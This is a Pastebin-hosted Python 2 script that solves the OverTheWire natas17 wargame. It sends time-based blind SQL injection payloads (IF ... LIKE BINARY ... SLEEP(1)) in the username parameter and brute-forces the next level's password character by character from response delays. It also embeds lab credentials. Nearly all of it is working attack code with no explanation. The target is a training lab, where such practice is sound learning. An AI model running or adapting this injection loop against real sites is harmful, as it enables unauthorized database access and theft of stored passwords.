Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/env python
- import pycurl, requests
- import time
- url = 'http://natas17.natas.labs.overthewire.org/index.php'
- username = 'natas17'
- password = '8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw'
- exists = 'This user exists.'
- doesnt_exist = 'This user doesn\'t exist.'
- sleep_time = 1.0
- def checkChar(knownStr, nextChar):
- ind = len(knownStr)
- check = knownStr + nextChar + ('_'*(32-ind-1))
- #natas16" OR 1=IF((select count(*) from users where username="natas16" and password LIKE BINARY "WaIHEacj63wnNIBROHeqi3p9t0m5nhmh") = 1, SLEEP(1), 0) --
- urlAll = url+'?username=natas18" OR 1=IF((select count(*) from users where username="natas18" and password LIKE BINARY "' + check + '") = 1, SLEEP(1), 0) -- '
- #print urlAll
- start = time.time()
- r = requests.get(urlAll, auth=(username, password))
- roundtrip = time.time() - start
- print roundtrip
- #print r.status_code
- #print r.headers
- #print r.text
- #raw_input()
- return roundtrip > sleep_time
- #return doesnt_exist not in r.text
- #natas16" AND password RLIKE BINARY "WaIHEac[a-z]
- knownStr = ""
- for i in range(len(knownStr) + 1, 33):
- print i, "symbol brutes:",
- charData = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789'
- for char in charData:
- print char,
- if checkChar(knownStr, char):
- knownStr += char
- print 'Found'
- break
- else:
- print 'Not Found'
- print "knownStr", knownStr
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement